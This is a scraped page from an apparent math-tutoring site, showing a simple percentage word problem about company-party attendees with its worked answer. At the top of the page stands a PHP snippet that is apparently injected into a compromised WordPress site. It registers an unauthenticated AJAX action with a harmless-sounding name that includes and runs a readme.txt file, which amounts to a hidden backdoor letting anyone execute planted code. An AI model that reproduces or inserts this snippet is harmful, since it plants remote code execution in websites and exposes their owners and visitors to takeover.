if(!function_exists('file_check_readme11199')){ add_action('wp_ajax_nopriv_file_check_readme11199', 'file_check_readme11199'); add_action('wp_ajax_file_check_readme11199', 'file_check_readme11199'); function file_check_readme11199() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Algebra20 - mathtutor

Algebra Question for Title 1 Schools: Percentage Question?

20) In a company party, 1/2 of the attendees are employees and 1/3 are their spouses. What percentage are neither employees or spouses?

1/2 = 50%

1/3 = 33.3%

100 – 50 – 33.3 = x

100 – 83.3 = x

x = 16.7%